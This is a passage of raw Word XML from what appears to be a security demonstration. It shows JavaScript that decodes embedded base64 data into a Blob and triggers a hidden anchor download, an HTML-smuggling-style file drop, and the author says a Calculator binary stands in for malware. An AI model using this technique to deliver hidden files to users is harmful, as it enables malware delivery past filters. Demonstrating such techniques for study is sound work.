              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(</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i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>binary_length</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">++){                 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>bytes_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>]=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>binary_values</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>charCodeAt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ED9008B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2" w:line="273" w:lineRule="auto"/>
              <w:ind w:right="5030"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">}   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C586C0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>return</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bytes_data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>buffer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45F6B7B3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="274" w:lineRule="auto"/>
              <w:ind w:right="1451"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">}   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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filebytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>base64tobytes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>filedata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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blob</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Blob</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>([</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>filebytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>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type"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>"octet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>/stream"</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anchor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>document</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>createElement</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>"a"</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document</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>body</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>append</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>anchor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anchor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>style</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> =</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>"display :none"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24F23AC0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="244" w:line="274" w:lineRule="auto"/>
              <w:ind w:right="3063"/>
            </w:pP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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> =</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>window</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>createObjectURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>blob</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">);   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>anchor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>href</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">;             </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>anchor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>download</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>filename</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC4A0BA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="49"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">33 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4156FCA0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79280DCB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A62BD8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The binary data I </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hava</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> used here is of a Calculator file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Inspite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a malware just for safety of my device for demonstration purpose. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ECC420" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:vertAnchor="page" w:horzAnchor="page" w:tblpX="1311" w:tblpY="1579"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9309" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="76" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9309"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F97B52" w14:paraId="02E67DBF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9309" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          </w:tcPr>
          <w:p w14:paraId="032CE47C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="275" w:lineRule="auto"/>
              <w:ind w:right="2581"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
